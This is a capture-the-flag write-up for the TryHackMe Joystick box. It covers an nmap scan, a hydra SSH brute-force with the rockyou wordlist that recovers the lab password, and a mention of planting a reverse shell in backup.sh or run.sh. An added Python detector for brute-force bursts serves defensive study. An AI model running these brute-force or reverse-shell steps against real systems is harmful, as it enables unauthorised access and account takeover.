TryHackMe-Joystick

Box link

Information gathering

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 09:57 CST
Nmap scan report for 192.168.10.154
Host is up (0.00033s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c7:ce:5d:fa:24:68:3a:10:63:f9:28:1b:f4:6d:e5:bc (RSA)
| 256 6b:7b:f5:12:e0:db:bb:b0:ca:f8:f8:c0:84:bc:27:e6 (ECDSA)
|_ 256 1b:d4:20:23:d0:5b:32:16:ad:c2:a9:cd:99:1c:e6:6e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: JoyStick Gaming
25565/tcp open minecraft Minecraft 1.13.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Information disclosure: FTP does not work, and the user steve is presumably the SSH user. The text also mentions a password, so the guess is a weak one; try brute-forcing it.

$ hydra -l steve -P ~/tools/rockyou.txt ssh://192.168.10.154 -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-23 10:16:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ssh://192.168.10.154:22/

[STATUS] 797.00 tries/min, 797 tries in 00:01h, 14343696 to do in 299:58h, 64 active
[STATUS] 583.00 tries/min, 1749 tries in 00:03h, 14342780 to do in 410:02h, 64 active
[STATUS] 519.00 tries/min, 3633 tries in 00:07h, 14340896 to do in 460:32h, 64 active
[22][ssh] host: 192.168.10.154 login: steve password: changeme
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 51 final worker threads did not complete until end.
[ERROR] 51 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-23 10:24:06
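An added example, not from the original writeup, of what this brute-force looks like from the defender's side: a small Python detector over sshd auth-log lines that flags a burst of failed logins from one source and then a successful login from that same source (the pattern hydra leaves behind). The log lines and the addresses 192.168.10.1 and 10.0.0.7 are constructed for the example, and the log year is assumed to be 2020.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines (not captured from the box); the year is assumed.
SAMPLE_LOG = """\
Jun 23 10:16:47 joystick sshd[1201]: Failed password for steve from 192.168.10.1 port 50122 ssh2
Jun 23 10:16:48 joystick sshd[1202]: Failed password for invalid user admin from 192.168.10.1 port 50123 ssh2
Jun 23 10:16:48 joystick sshd[1203]: Failed password for steve from 192.168.10.1 port 50124 ssh2
Jun 23 10:16:49 joystick sshd[1204]: Failed password for steve from 192.168.10.1 port 50125 ssh2
Jun 23 10:16:49 joystick sshd[1205]: Failed password for steve from 192.168.10.1 port 50126 ssh2
Jun 23 10:16:50 joystick sshd[1206]: Accepted password for steve from 192.168.10.1 port 50127 ssh2
Jun 23 10:30:00 joystick sshd[1300]: Failed password for steve from 10.0.0.7 port 40001 ssh2
Jun 23 10:31:00 joystick sshd[1301]: Accepted password for steve from 10.0.0.7 port 40002 ssh2
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2020):
    """Return alerts as (kind, ip, user) tuples. A source IP is flagged once it
    accumulates `threshold` failures inside a sliding window of `window_s`
    seconds; any later successful login from a flagged IP is alerted too."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # not a password-auth event; ignore
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()         # drop failures that fell out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, m["user"]))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, m["user"]))
    return alerts
```

Single failures from an unflagged source, like the 10.0.0.7 lines, produce no alert; the 64-task hydra run above would trip the threshold within its first second.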

Privilege escalation

Login succeeded.

Didn't expect it to be this simple..

A reverse shell can be written into backup.sh or run.sh.

Summary

The box author's writeup says:

As a final item of note, this box is meant as a counter modern capture-the-flag design through the inclusion of services which simply don’t work and with unconventional construction logic through the lens of a younger admin. Careful thought was taken to use commands, instructions, and commit mistakes (i.e. misconfigurations and typos) akin to that which a junior admin would make and use.